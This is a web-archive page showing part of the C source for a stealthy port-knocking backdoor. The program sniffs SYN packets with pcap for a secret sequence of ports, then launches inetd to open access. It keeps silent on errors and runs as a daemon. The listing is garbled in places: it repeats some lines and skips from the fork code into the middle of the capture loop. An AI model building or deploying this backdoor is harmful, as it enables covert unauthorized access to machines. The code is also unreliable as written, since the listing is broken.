📄 362.htm
字号:
<br>
<br>
execv("/usr/sbin/inetd",args); <br>
<br>
#ifdef DEBUG <br>
#ifdef DEBUG <br>
<br>
printf("Strange return from execvp() !\n"); <br>
<br>
#endif DEBUG <br>
<br>
exit (0); <br>
<br>
<br>
<br>
} <br>
<br>
<br>
<br>
<br>
<br>
/* error function for pcap lib */ <br>
<br>
void capterror(pcap_t *caps, char *message) { <br>
<br>
pcap_perror(caps,message); <br>
<br>
exit (-1); <br>
exit (-1); <br>
<br>
} <br>
<br>
<br>
<br>
/* signal counter/handler */ <br>
<br>
void signal_handler(int sig) { <br>
<br>
/* the ugly way ... */ <br>
<br>
_exit(0); <br>
<br>
} <br>
<br>
<br>
<br>
void *smalloc(size_t size) { <br>
<br>
void *p; <br>
<br>
<br>
<br>
<br>
if ((p=malloc(size))==NULL) { <br>
<br>
exit(-1); <br>
<br>
} <br>
<br>
memset(p,0,size); <br>
<br>
return p; <br>
<br>
} <br>
<br>
<br>
<br>
<br>
<br>
/* general rules in main(): <br>
<br>
* - errors force an exit without comment to keep the silence <br>
<br>
* - errors in the initialization phase can be displayed by a <br>
<br>
* command line option <br>
<br>
*/ <br>
<br>
int main (int argc, char **argv) { <br>
<br>
<br>
<br>
/* variables for the pcap functions */ <br>
<br>
#define CDR_BPF_PORT "port " <br>
<br>
#define CDR_BPF_ORCON " or " <br>
<br>
char pcap_err[PCAP_ERRBUF_SIZE]; /* buffer for pcap errors * <br>
<br>
pcap_t *cap; /* capture handler */ <br>
<br>
bpf_u_int32 network,netmask; <br>
<br>
struct pcap_pkthdr *phead; <br>
<br>
struct bpf_program cfilter; /* the compiled filter */ <br>
<br>
struct iphdr *ip; <br>
<br>
struct tcphdr *tcp; <br>
<br>
u_char *pdata; <br>
<br>
/* for filter compilation */ <br>
<br>
char *filter; <br>
<br>
char portnum[6]; <br>
<br>
/* command line */ <br>
<br>
int cdr_noise = 0; <br>
<br>
/* the usual int i */ <br>
<br>
int i; <br>
<br>
<br>
<br>
/* for resolving the CDR_ADDRESS */ <br>
<br>
#ifdef CDR_ADDRESS <br>
<br>
struct hostent *hent; <br>
<br>
#endif CDR_ADDRESS <br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
/* check for the one and only command line argument */ <br>
<br>
if (argc>1) { <br>
<br>
if (!strcmp(argv[1],CDR_NOISE_COMMAND)) <br>
<br>
cdr_noise++; <br>
<br>
else <br>
<br>
exit (0); <br>
<br>
} <br>
<br>
<br>
<br>
/* resolve our address - if desired */ <br>
<br>
#ifdef CDR_ADDRESS <br>
<br>
if ((hent=gethostbyname(CDR_ADDRESS))==NULL) { <br>
<br>
if (cdr_noise) <br>
<br>
fprintf(stderr,"gethostbyname() failed\n"); <br>
<br>
exit (0); <br>
<br>
} <br>
<br>
#endif CDR_ADDRESS <br>
<br>
<br>
<br>
/* count the ports our user has #defined */ <br>
<br>
while (cports[cportcnt++]); <br>
<br>
cportcnt--; <br>
<br>
#ifdef DEBUG <br>
<br>
printf("%d ports used as code\n",cportcnt); <br>
<br>
#endif DEBUG <br>
<br>
<br>
<br>
/* to speed up the capture, we create an filter string to compile. <br>
<br>
* For this, we check if the first port is defined and create it's filter, <br>
<br>
* then we add the others */ <br>
<br>
<br>
<br>
if (cports[0]) { <br>
<br>
memset(&portnum,0,6); <br>
<br>
sprintf(portnum,"%d",cports[0]); <br>
<br>
filter=(char *)smalloc(strlen(CDR_BPF_PORT)+strlen(portnum)+1); <br>
<br>
strcpy(filter,CDR_BPF_PORT); <br>
<br>
strcat(filter,portnum); <br>
<br>
} else { <br>
<br>
if (cdr_noise) <br>
<br>
fprintf(stderr,"NO port code\n"); <br>
<br>
exit (0); <br>
<br>
} <br>
<br>
<br>
<br>
/* here, all other ports will be added to the filter string which reads <br>
<br>
* like this: <br>
<br>
* port <1> or port <2> or port <3> ... <br>
<br>
* see tcpdump(1) <br>
<br>
*/ <br>
<br>
<br>
<br>
for (i=1;i<cportcnt;i++) { <br>
<br>
if (cports[i]) { <br>
<br>
memset(&portnum,0,6); <br>
<br>
sprintf(portnum,"%d",cports[i]); <br>
<br>
if ((filter=(char *)realloc(filter, <br>
<br>
strlen(filter)+ <br>
<br>
strlen(CDR_BPF_PORT)+ <br>
<br>
strlen(portnum)+ <br>
<br>
strlen(CDR_BPF_ORCON)+1)) <br>
<br>
==NULL) { <br>
<br>
if (cdr_noise) <br>
<br>
fprintf(stderr,"realloc() failed\n"); <br>
<br>
exit (0); <br>
<br>
} <br>
<br>
strcat(filter,CDR_BPF_ORCON); <br>
<br>
strcat(filter,CDR_BPF_PORT); <br>
<br>
strcat(filter,portnum); <br>
<br>
} <br>
<br>
} <br>
<br>
<br>
<br>
#ifdef DEBUG <br>
<br>
printf("DEBUG: '%s'\n",filter); <br>
<br>
#endif DEBUG <br>
#endif DEBUG <br>
<br>
<br>
<br>
/* initialize the pcap 'listener' */ <br>
<br>
if (pcap_lookupnet(CDR_INTERFACE,&network,&netmask,pcap_err)!=0) { <br>
<br>
if (cdr_noise) <br>
<br>
fprintf(stderr,"pcap_lookupnet: %s\n",pcap_err); <br>
<br>
exit (0); <br>
<br>
} <br>
<br>
<br>
<br>
/* open the 'listener' */ <br>
<br>
if ((cap=pcap_open_live(CDR_INTERFACE,CAPLENGTH, <br>
<br>
0, /*not in promiscuous mode*/ <br>
<br>
0, /*no timeout */ <br>
<br>
pcap_err))==NULL) { <br>
<br>
if (cdr_noise) <br>
<br>
fprintf(stderr,"pcap_open_live: %s\n",pcap_err); <br>
<br>
exit (0); <br>
<br>
} <br>
<br>
<br>
<br>
/* now, compile the filter and assign it to our capture */ <br>
<br>
if (pcap_compile(cap,&cfilter,filter,0,netmask)!=0) { <br>
<br>
if (cdr_noise) <br>
<br>
capterror(cap,"pcap_compile"); <br>
<br>
exit (0); <br>
<br>
} <br>
<br>
if (pcap_setfilter(cap,&cfilter)!=0) { <br>
<br>
if (cdr_noise) <br>
<br>
capterror(cap,"pcap_setfilter"); <br>
<br>
exit (0); <br>
<br>
} <br>
<br>
<br>
<br>
/* the filter is set - let's free the base string*/ <br>
<br>
free(filter); <br>
<br>
/* allocate a packet header structure */ <br>
<br>
phead=(struct pcap_pkthdr *)smalloc(sizeof(struct pcap_pkthdr)); <br>
<br>
<br>
<br>
/* register signal handler */ <br>
<br>
signal(SIGABRT,&signal_handler); <br>
<br>
signal(SIGTERM,&signal_handler); <br>
<br>
signal(SIGINT,&signal_handler); <br>
<br>
<br>
<br>
/* if we don't use DEBUG, let's be nice and close the streams */ <br>
<br>
#ifndef DEBUG <br>
<br>
fclose(stdin); <br>
<br>
fclose(stdout); <br>
<br>
fclose(stderr); <br>
<br>
#endif DEBUG <br>
<br>
<br>
<br>
/* go daemon */ <br>
<br>
switch (i=fork()) { <br>
<br>
case -1: <br>
<br>
if (cdr_noise) <br>
<br>
fprintf(stderr,"fork() failed\n"); <br>
<br>
exit (0); <br>
<br>
<br>
<br>
/* FLAG check's - see rfc793 */ <br>
<br>
/* if it isn't a SYN packet, continue */ <br>
<br>
if (!(ntohs(tcp->rawflags)&0x02)) continue; <br>
<br>
/* if it is a SYN-ACK packet, continue */ <br>
<br>
if (ntohs(tcp->rawflags)&0x10) continue; <br>
<br>
<br>
<br>
#ifdef CDR_ADDRESS <br>
<br>
/* if the address is not the one defined above, let it be */ <br>
<br>
if (hent) { <br>
<br>
#ifdef DEBUG <br>
<br>
if (memcmp(&ip->daddr,hent->h_addr_list[0],hent->h_length)) { <br>
<br>
printf("Destination address mismatch\n"); <br>
<br>
continue; <br>
<br>
} <br>
<br>
#else <br>
<br>
if (memcmp(&ip->daddr,hent->h_addr_list[0],hent->h_length)) <br>
<br>
continue; <br>
<br>
#endif DEBUG <br>
<br>
} <br>
<br>
#endif CDR_ADDRESS <br>
<br>
<br>
<br>
/* it is one of our ports, it is the correct destination <br>
<br>
* and it is a genuine SYN packet - let's see if it is the RIGHT <br>
<br>
* port */ <br>
<br>
if (ntohs(tcp->dest_port)==cports[actport]) { <br>
<br>
#ifdef DEBUG <br>
<br>
printf("Port %d is good as code part %d\n",ntohs(tcp->dest_port), <br>
<br>
actport); <br>
<br>
#endif DEBUG <br>
<br>
#ifdef CDR_SENDER_ADDR <br>
<br>
/* check if the sender is the same */ <br>
<br>
if (actport==0) { <br>
<br>
memcpy(&sender,&ip->saddr,4); <br>
<br>
} else { <br>
<br>
if (memcmp(&ip->saddr,&sender,4)) { /* sender is different */ <br>
<br>
actport=0; <br>
<br>
#ifdef DEBUG <br>
<br>
printf("Sender mismatch\n"); <br>
<br>
#endif DEBUG <br>
<br>
continue; <br>
<br>
} <br>
<br>
} <br>
<br>
#endif CDR_SENDER_ADDR <br>
<br>
/* it is the rigth port ... take the next one <br>
<br>
* or was it the last ??*/ <br>
<br>
if ((++actport)==cportcnt) { <br>
<br>
/* BINGO */ <br>
<br>
cdr_open_door(); <br>
<br>
actport=0; <br>
<br>
} /* ups... some more to go */ <br>
<br>
} else { <br>
<br>
#ifdef CDR_CODERESET <br>
<br>
actport=0; <br>
<br>
#endif CDR_CODERESET <br>
<br>
continue; <br>
<br>
} <br>
<br>
} /* end of main loop */ <br>
<br>
<br>
<br>
/* this is actually never reached, because the signal_handler() does the <br>
<br>
* exit. <br>
<br>
*/ <br>
<br>
return 0; <br>
<br>
} <br>
<br>
<br>
<br>
-- <br>
<br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="311.htm">上一层</a>][<a href="363.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -